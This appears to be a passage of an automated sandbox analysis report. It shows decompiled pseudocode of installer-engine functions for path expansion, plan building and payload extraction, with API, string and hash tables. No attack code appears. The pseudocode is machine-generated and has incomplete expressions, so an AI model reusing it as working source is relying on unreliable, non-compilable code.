                                                                                                                                                                  			E0043191F(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				long _v16;
                                                                                                                                                                  				signed int _t49;
                                                                                                                                                                  				long _t57;
                                                                                                                                                                  				void* _t63;
                                                                                                                                                                  				signed short _t65;
                                                                                                                                                                  				signed short _t66;
                                                                                                                                                                  				long _t69;
                                                                                                                                                                  				signed short _t77;
                                                                                                                                                                  				signed short _t78;
                                                                                                                                                                  				WCHAR* _t79;
                                                                                                                                                                  				long _t81;
                                                                                                                                                                  				long _t84;
                                                                                                                                                                  				long _t85;
                                                                                                                                                                  				long _t87;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  
                                                                                                                                                                  				_t79 = _a8;
                                                                                                                                                                  				_t49 = 0;
                                                                                                                                                                  				_v12 = _v12 & 0;
                                                                                                                                                                  				_t81 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t84 = 0x40;
                                                                                                                                                                  				if((_a12 & 0x00000001) == 0) {
                                                                                                                                                                  					L15:
                                                                                                                                                                  					if((_a12 & 0x00000002) == 0) {
                                                                                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                                                                                  						_v12 = _t49;
                                                                                                                                                                  						goto L31;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_a12 = _a12 & 0x00000000;
                                                                                                                                                                  						_t83 =  !=  ? _t49 : _t79;
                                                                                                                                                                  						_t85 =  >  ? _t81 : _t84;
                                                                                                                                                                  						_a8 =  !=  ? _t49 : _t79;
                                                                                                                                                                  						_t88 = E00433BDF( &_v12, _t85);
                                                                                                                                                                  						if(_t88 >= 0) {
                                                                                                                                                                  							_t57 = GetFullPathNameW(_a8, _t85, _v12,  &_a12);
                                                                                                                                                                  							if(_t57 != 0) {
                                                                                                                                                                  								if(_t85 >= _t57) {
                                                                                                                                                                  									L27:
                                                                                                                                                                  									if(_t57 <= 0x104) {
                                                                                                                                                                  										L29:
                                                                                                                                                                  										_t49 = _v12;
                                                                                                                                                                  										L31:
                                                                                                                                                                  										_t80 =  !=  ? _t49 : _t79;
                                                                                                                                                                  										_t88 = E00433F88(_a4,  !=  ? _t49 : _t79, 0);
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t88 = E00431D67( &_v12);
                                                                                                                                                                  										if(_t88 >= 0) {
                                                                                                                                                                  											goto L29;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t34 = _t57 + 7; // 0x7
                                                                                                                                                                  									_t87 =  <  ? _t57 : _t34;
                                                                                                                                                                  									_t88 = E00433BDF( &_v12, _t87);
                                                                                                                                                                  									if(_t88 >= 0) {
                                                                                                                                                                  										_t57 = GetFullPathNameW(_a8, _t87, _v12,  &_a12);
                                                                                                                                                                  										if(_t57 != 0) {
                                                                                                                                                                  											if(_t87 >= _t57) {
                                                                                                                                                                  												goto L27;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t63 = 0x8007007a;
                                                                                                                                                                  												_push(0x8007007a);
                                                                                                                                                                  												_push(0x133);
                                                                                                                                                                  												goto L25;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t65 = GetLastError();
                                                                                                                                                                  											_t91 =  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t63 = 0x80004005;
                                                                                                                                                                  											_t88 =  >=  ? 0x80004005 :  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_push(_t88);
                                                                                                                                                                  											_push(0x12e);
                                                                                                                                                                  											goto L26;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t66 = GetLastError();
                                                                                                                                                                  								_t94 =  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t63 = 0x80004005;
                                                                                                                                                                  								_t88 =  >=  ? 0x80004005 :  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_push(_t88);
                                                                                                                                                                  								_push(0x123);
                                                                                                                                                                  								goto L26;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v16 = _t84;
                                                                                                                                                                  					_t88 = E00433BDF( &_v8, _t84);
                                                                                                                                                                  					if(_t88 >= 0) {
                                                                                                                                                                  						_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
                                                                                                                                                                  						if(_t69 != 0) {
                                                                                                                                                                  							_t81 = _v16;
                                                                                                                                                                  							if(_t81 >= _t69) {
                                                                                                                                                                  								L10:
                                                                                                                                                                  								if(_t69 <= 0x104) {
                                                                                                                                                                  									L14:
                                                                                                                                                                  									_t49 = _v8;
                                                                                                                                                                  									goto L15;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t88 =  ==  ? 0 : E00431D67( &_v8);
                                                                                                                                                                  									if(_t88 >= 0) {
                                                                                                                                                                  										_t88 = E0043452E(_v8,  &_v16);
                                                                                                                                                                  										if(_t88 >= 0) {
                                                                                                                                                                  											_t81 = _v16;
                                                                                                                                                                  											goto L14;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_v16 = _t69;
                                                                                                                                                                  								_t88 = E00433BDF( &_v8, _t69);
                                                                                                                                                                  								if(_t88 >= 0) {
                                                                                                                                                                  									_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
                                                                                                                                                                  									if(_t69 != 0) {
                                                                                                                                                                  										_t81 = _v16;
                                                                                                                                                                  										if(_t81 >= _t69) {
                                                                                                                                                                  											goto L10;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t63 = 0x8007007a;
                                                                                                                                                                  											_push(0x8007007a);
                                                                                                                                                                  											_push(0x102);
                                                                                                                                                                  											L25:
                                                                                                                                                                  											_t88 = _t63;
                                                                                                                                                                  											goto L26;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t77 = GetLastError();
                                                                                                                                                                  										_t98 =  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t63 = 0x80004005;
                                                                                                                                                                  										_t88 =  >=  ? 0x80004005 :  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_push(_t88);
                                                                                                                                                                  										_push(0xfd);
                                                                                                                                                                  										goto L26;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t78 = GetLastError();
                                                                                                                                                                  							_t101 =  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t63 = 0x80004005;
                                                                                                                                                                  							_t88 =  >=  ? 0x80004005 :  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_push(_t88);
                                                                                                                                                                  							_push(0xf2);
                                                                                                                                                                  							L26:
                                                                                                                                                                  							_push("pathutil.cpp");
                                                                                                                                                                  							E004300D9(_t63);
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t88;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,00000040,00000000,00000000), ref: 00431963
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043196D
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,00000000), ref: 004319BB
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004319C5
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000040,004103DF,00000000,004103DF,00000040,00000000,00000000), ref: 00431A82
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00431A8C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandStrings$FullNamePath
                                                                                                                                                                  • String ID: pathutil.cpp
                                                                                                                                                                  • API String ID: 3720696297-741606033
                                                                                                                                                                  • Opcode ID: 8302609f9341bf9baa515b09c419db5eac0591efa8fb8540263865f7f5c746d4
                                                                                                                                                                  • Instruction ID: a1ab15e9507b1f8aeada4e08483d79cae5328f2b4c6e9037c4160056fb2a0d6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8302609f9341bf9baa515b09c419db5eac0591efa8fb8540263865f7f5c746d4
                                                                                                                                                                  • Instruction Fuzzy Hash: B461C732E00229ABEF219AA58C45BAFB6E9EF48741F115177FD01E7160E738DE00D798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040B90E(signed int _a4, short** _a8, signed short* _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				short* _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  				int* _t92;
                                                                                                                                                                  				int* _t95;
                                                                                                                                                                  				intOrPtr* _t98;
                                                                                                                                                                  				intOrPtr* _t103;
                                                                                                                                                                  				intOrPtr* _t106;
                                                                                                                                                                  				signed short _t115;
                                                                                                                                                                  				intOrPtr _t123;
                                                                                                                                                                  				signed int _t128;
                                                                                                                                                                  				signed short _t134;
                                                                                                                                                                  				short** _t135;
                                                                                                                                                                  				signed int _t137;
                                                                                                                                                                  				intOrPtr _t138;
                                                                                                                                                                  				short* _t140;
                                                                                                                                                                  				signed short _t144;
                                                                                                                                                                  				signed int _t145;
                                                                                                                                                                  				signed short _t148;
                                                                                                                                                                  				signed int _t149;
                                                                                                                                                                  				signed int _t150;
                                                                                                                                                                  				int _t151;
                                                                                                                                                                  				int _t152;
                                                                                                                                                                  				short** _t153;
                                                                                                                                                                  				signed int _t154;
                                                                                                                                                                  				signed int _t156;
                                                                                                                                                                  				signed int _t157;
                                                                                                                                                                  
                                                                                                                                                                  				_t129 = _a8;
                                                                                                                                                                  				_t128 = _a4;
                                                                                                                                                                  				_t140 =  *_a8;
                                                                                                                                                                  				_t144 = 0;
                                                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                                                  				_t150 = 0;
                                                                                                                                                                  				_v12 = _t140;
                                                                                                                                                                  				if( *((intOrPtr*)(_t128 + 0x50)) <= 0) {
                                                                                                                                                                  					L6:
                                                                                                                                                                  					_t151 =  *0x456f50; // 0x0
                                                                                                                                                                  					_t152 = _t151 + 1;
                                                                                                                                                                  					 *0x456f50 = _t152;
                                                                                                                                                                  					_t144 = E0040BD21(_t129, _t162, _t128,  &_v8);
                                                                                                                                                                  					_t163 = _t144;
                                                                                                                                                                  					if(_t144 < 0) {
                                                                                                                                                                  						L9:
                                                                                                                                                                  						_push("Failed to append package start action.");
                                                                                                                                                                  						L24:
                                                                                                                                                                  						_push(_t144);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						goto L26;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t92 = _v8;
                                                                                                                                                                  					 *_t92 = 1;
                                                                                                                                                                  					_t92[2] = _t152;
                                                                                                                                                                  					_t144 = E0040C0DB(_t129, _t163, _t128,  &_v8);
                                                                                                                                                                  					_t164 = _t144;
                                                                                                                                                                  					if(_t144 < 0) {
                                                                                                                                                                  						L14:
                                                                                                                                                                  						_push("Failed to append rollback cache action.");
                                                                                                                                                                  						goto L24;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t95 = _v8;
                                                                                                                                                                  					 *_t95 = 1;
                                                                                                                                                                  					_t95[2] = _t152;
                                                                                                                                                                  					_t144 = E0040BD21(_t129, _t164, _t128,  &_v8);
                                                                                                                                                                  					if(_t144 >= 0) {
                                                                                                                                                                  						_t98 = _v8;
                                                                                                                                                                  						_t153 = _a8;
                                                                                                                                                                  						 *_t98 = 3;
                                                                                                                                                                  						 *(_t98 + 8) = _t153;
                                                                                                                                                                  						_a4 =  *((intOrPtr*)(_t128 + 0x50)) - 1;
                                                                                                                                                                  						_t144 = E0040C0DB(_t129, __eflags, _t128,  &_v8);
                                                                                                                                                                  						__eflags = _t144;
                                                                                                                                                                  						if(_t144 >= 0) {
                                                                                                                                                                  							_t103 = _v8;
                                                                                                                                                                  							_t145 = 0;
                                                                                                                                                                  							 *_t103 = 5;
                                                                                                                                                                  							 *(_t103 + 8) = _t153;
                                                                                                                                                                  							_v12 = 0;
                                                                                                                                                                  							__eflags = _t153[0x20];
                                                                                                                                                                  							if(__eflags <= 0) {
                                                                                                                                                                  								L18:
                                                                                                                                                                  								_t144 = E0040BD21(_t129, __eflags, _t128,  &_v8);
                                                                                                                                                                  								__eflags = _t144;
                                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                                  									L20:
                                                                                                                                                                  									_push("Failed to append cache action.");
                                                                                                                                                                  									goto L24;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t106 = _v8;
                                                                                                                                                                  								 *_t106 = 4;
                                                                                                                                                                  								 *(_t106 + 8) = _t153;
                                                                                                                                                                  								 *((intOrPtr*)(_a4 * 0x28 +  *((intOrPtr*)(_t128 + 0x4c)) + 0x18)) =  *((intOrPtr*)(_t128 + 0x50)) - 1;
                                                                                                                                                                  								_t144 = E0040BD21( *((intOrPtr*)(_t128 + 0x50)) - 1, __eflags, _t128,  &_v8);
                                                                                                                                                                  								__eflags = _t144;
                                                                                                                                                                  								if(_t144 >= 0) {
                                                                                                                                                                  									_t154 = _v8;
                                                                                                                                                                  									 *_t154 = 6;
                                                                                                                                                                  									_t134 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                                  									 *(_t154 + 8) = _t134;
                                                                                                                                                                  									__eflags = _t134;
                                                                                                                                                                  									if(_t134 != 0) {
                                                                                                                                                                  										 *_a12 = _t134;
                                                                                                                                                                  										_t135 = _a8;
                                                                                                                                                                  										 *((intOrPtr*)(_t128 + 0x34)) =  *((intOrPtr*)(_t128 + 0x34)) + 1;
                                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t135 + 0x44)) - 2;
                                                                                                                                                                  										_t86 =  *((intOrPtr*)(_t135 + 0x44)) != 2;
                                                                                                                                                                  										__eflags = _t86;
                                                                                                                                                                  										 *(_t135 + 0x54) = 0 | _t86;
                                                                                                                                                                  										goto L26;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t115 = GetLastError();
                                                                                                                                                                  									__eflags = _t115;
                                                                                                                                                                  									_t148 =  <=  ? _t115 : _t115 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eflags = _t148;
                                                                                                                                                                  									_t144 =  >=  ? 0x80004005 : _t148;
                                                                                                                                                                  									E004300D9(0x80004005, "plan.cpp", 0x723, _t144);
                                                                                                                                                                  									_push("Failed to create syncpoint event.");
                                                                                                                                                                  									goto L24;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L20;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L16;
                                                                                                                                                                  							}
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								L16:
                                                                                                                                                                  								_v16 = _t153[0x1f];
                                                                                                                                                                  								_t144 = E0040BD6A(_t128, _t153, _a4,  *((intOrPtr*)(_t153[0x1f] + _t145 * 8)),  *((intOrPtr*)(_t153[0x1f] + 4 + _t145 * 8)), 0);
                                                                                                                                                                  								__eflags = _t144;
                                                                                                                                                                  								if(_t144 < 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t156 = _a4 * 0x28;
                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0xc)) + 1;
                                                                                                                                                                  								_t149 = _v12;
                                                                                                                                                                  								_t129 =  *((intOrPtr*)(_v16 + _t149 * 8));
                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x4c)) + _t156 + 0x10)) +  *((intOrPtr*)( *((intOrPtr*)(_v16 + _t149 * 8)) + 0x10));
                                                                                                                                                                  								asm("adc [edx+esi+0x14], eax");
                                                                                                                                                                  								_t153 = _a8;
                                                                                                                                                                  								_t145 = _t149 + 1;
                                                                                                                                                                  								_v12 = _t145;
                                                                                                                                                                  								__eflags = _t145 - _t153[0x20];
                                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to append payload cache action.");
                                                                                                                                                                  							goto L24;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L14;
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t137 = 0;
                                                                                                                                                                  					_a4 = 0;
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t123 =  *((intOrPtr*)(_t128 + 0x4c));
                                                                                                                                                                  						if( *((intOrPtr*)(_t123 + _t137)) != 4) {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(CompareStringW(0, 0,  *( *(_t123 + _t137 + 8)), 0xffffffff, _t140, 0xffffffff) == 2) {
                                                                                                                                                                  							_t23 = _t150 + 1; // 0x1
                                                                                                                                                                  							__eflags = _t23 -  *((intOrPtr*)(_t128 + 0x50));
                                                                                                                                                                  							if(_t23 <  *((intOrPtr*)(_t128 + 0x50))) {
                                                                                                                                                                  								_t138 =  *((intOrPtr*)(_t128 + 0x4c));
                                                                                                                                                                  								_t157 = _t150 * 0x28;
                                                                                                                                                                  								__eflags =  *((intOrPtr*)(_t157 + _t138 + 0x28)) - 6;
                                                                                                                                                                  								if( *((intOrPtr*)(_t157 + _t138 + 0x28)) == 6) {
                                                                                                                                                                  									 *_a12 =  *(_t157 + _t138 + 0x30);
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							L26:
                                                                                                                                                                  							return _t144;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t137 = _a4;
                                                                                                                                                                  						_t140 = _v12;
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_t150 = _t150 + 1;
                                                                                                                                                                  						_t137 = _t137 + 0x28;
                                                                                                                                                                  						_a4 = _t137;
                                                                                                                                                                  						_t162 = _t150 -  *((intOrPtr*)(_t128 + 0x50));
                                                                                                                                                                  					} while (_t150 <  *((intOrPtr*)(_t128 + 0x50)));
                                                                                                                                                                  					goto L6;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,000000FF,00000001,000000FF,00000000,000003D8,000000F8,0000001C,000003BC,00401414,00000088,000003D8,000002A8,000000B8), ref: 0040B94B
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,000003BC,00401414,000003BC,00401414,000003BC,00401414,000003BC,00401414,000003BC,00401414,000003BC,00401414), ref: 0040BAEB
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401414,00000000,?,?,?,?,00401EA4,?,?), ref: 0040BAFA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append package start action., xrefs: 0040B9BD
                                                                                                                                                                  • Failed to append rollback cache action., xrefs: 0040BA18
                                                                                                                                                                  • Failed to append cache action., xrefs: 0040BACD
                                                                                                                                                                  • plan.cpp, xrefs: 0040BB1E
                                                                                                                                                                  • Failed to append payload cache action., xrefs: 0040BAD4
                                                                                                                                                                  • Failed to create syncpoint event., xrefs: 0040BB28
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareCreateErrorEventLastString
                                                                                                                                                                  • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                                  • API String ID: 801187047-2489563283
                                                                                                                                                                  • Opcode ID: cdedbb8e4400c648185ca9d63d4ff5074e001d855e1025adf4abed2c83878732
                                                                                                                                                                  • Instruction ID: 7f3dadcc25ffc38f38689847690c8a67db67647abe1a96bf27d72611fed998e7
                                                                                                                                                                  • Opcode Fuzzy Hash: cdedbb8e4400c648185ca9d63d4ff5074e001d855e1025adf4abed2c83878732
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D715F75A00205EFDB15DF58C880A6AB7F5FF88310F2180AAED15AB395DB35ED41CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00407D91(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				int _v24;
                                                                                                                                                                  				short* _v28;
                                                                                                                                                                  				intOrPtr _t50;
                                                                                                                                                                  				int _t58;
                                                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                                                  				intOrPtr* _t62;
                                                                                                                                                                  				intOrPtr* _t64;
                                                                                                                                                                  				int _t67;
                                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                                  				int _t70;
                                                                                                                                                                  				int _t71;
                                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                                  
                                                                                                                                                                  				_t70 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t71 = E00418F25(_a12,  &_v8);
                                                                                                                                                                  					if(_t71 == 0x80070103) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t71 < 0) {
                                                                                                                                                                  						_push("Failed to get next stream.");
                                                                                                                                                                  						goto L28;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t62 = _a4;
                                                                                                                                                                  						_t67 = _t70;
                                                                                                                                                                  						_v28 = _v8;
                                                                                                                                                                  						_v20 = _t67;
                                                                                                                                                                  						if( *((intOrPtr*)(_t62 + 4)) <= _t70) {
                                                                                                                                                                  							L10:
                                                                                                                                                                  							_t50 = _v16;
                                                                                                                                                                  							_t71 = 0x80070490;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t58 = _t70;
                                                                                                                                                                  							_v24 = _t70;
                                                                                                                                                                  							do {
                                                                                                                                                                  								_t73 =  *_t62 + _t58;
                                                                                                                                                                  								if( *((intOrPtr*)(_t73 + 4)) != 2) {
                                                                                                                                                                  									goto L9;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t69 = _a8;
                                                                                                                                                                  									if(_t69 == 0 ||  *((intOrPtr*)(_t73 + 0x3c)) == _t69) {
                                                                                                                                                                  										if(CompareStringW(0x7f, _t70,  *(_t73 + 0x38), 0xffffffff, _v28, 0xffffffff) == 2) {
                                                                                                                                                                  											_t50 = _t73;
                                                                                                                                                                  											_v16 = _t50;
                                                                                                                                                                  											_t71 = _t70;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t58 = _v24;
                                                                                                                                                                  											_t67 = _v20;
                                                                                                                                                                  											goto L9;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										goto L9;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L11;
                                                                                                                                                                  								L9:
                                                                                                                                                                  								_t67 = _t67 + 1;
                                                                                                                                                                  								_t58 = _t58 + 0x58;
                                                                                                                                                                  								_v20 = _t67;
                                                                                                                                                                  								_v24 = _t58;
                                                                                                                                                                  								_t19 = _t62 + 4; // 0x8b2c74db
                                                                                                                                                                  							} while (_t67 <  *_t19);
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						L11:
                                                                                                                                                                  						if(_t71 < 0) {
                                                                                                                                                                  							_push(_v8);
                                                                                                                                                                  							_push("Failed to find embedded payload: %ls");
                                                                                                                                                                  							L34:
                                                                                                                                                                  							_push(_t71);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t21 = _t50 + 0x50; // 0x4021f7
                                                                                                                                                                  							_t63 = _t21;
                                                                                                                                                                  							_t22 = _t50 + 0x18; // 0x4ccfe853
                                                                                                                                                                  							_t71 = E004314A9(_a16,  *_t22, _t21);
                                                                                                                                                                  							if(_t71 < 0) {
                                                                                                                                                                  								_push("Failed to concat file paths.");
                                                                                                                                                                  								goto L28;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t71 = E00431C88(_t67,  *_t63,  &_v12);
                                                                                                                                                                  								if(_t71 < 0) {
                                                                                                                                                                  									_push("Failed to get directory portion of local file path");
                                                                                                                                                                  									goto L28;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t71 = E00437850(_v12, _t70);
                                                                                                                                                                  									if(_t71 < 0) {
                                                                                                                                                                  										_push("Failed to ensure directory exists");
                                                                                                                                                                  										goto L28;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t71 = E00419196(_a12,  *_t63);
                                                                                                                                                                  										if(_t71 < 0) {
                                                                                                                                                                  											_push("Failed to extract file.");
                                                                                                                                                                  											L28:
                                                                                                                                                                  											_push(_t71);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  										} else {
                                                                                                                                                                  											 *((intOrPtr*)(_v16 + 0x4c)) = 1;
                                                                                                                                                                  											continue;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					L35:
                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                  						E004380AB(_v8);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                                  						E004380AB(_v12);
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t71;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t60 = _a4;
                                                                                                                                                                  				_t71 = _t70;
                                                                                                                                                                  				if( *((intOrPtr*)(_t60 + 4)) > _t71) {
                                                                                                                                                                  					_t64 =  *_t60;
                                                                                                                                                                  					_t68 = _a8;
                                                                                                                                                                  					do {
                                                                                                                                                                  						if(_t68 == 0 ||  *((intOrPtr*)(_t64 + 0x3c)) == _t68) {
                                                                                                                                                                  							if( *((intOrPtr*)(_t64 + 0x4c)) < 1) {
                                                                                                                                                                  								_t71 = 0x8007000d;
                                                                                                                                                                  								E004300D9(_t60, "payload.cpp", 0x119, 0x8007000d);
                                                                                                                                                                  								_push( *_t64);
                                                                                                                                                                  								_push("Payload was not found in container: %ls");
                                                                                                                                                                  								goto L34;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								goto L23;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L23;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L35;
                                                                                                                                                                  						L23:
                                                                                                                                                                  						_t70 = _t70 + 1;
                                                                                                                                                                  						_t64 = _t64 + 0x58;
                                                                                                                                                                  						_t36 = _t60 + 4; // 0x8b2c74db
                                                                                                                                                                  					} while (_t70 <  *_t36);
                                                                                                                                                                  				}
                                                                                                                                                                  				goto L35;
                                                                                                                                                                  			}





















                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,0040223F,000000FF,004021A3,00402283,00401DDF,00000000,00401EAB,0040223F,0040227F,004021A3,004021A7,00401F17), ref: 00407DED
                                                                                                                                                                  Strings
                                                                                                                                                                  • Payload was not found in container: %ls, xrefs: 00407F17
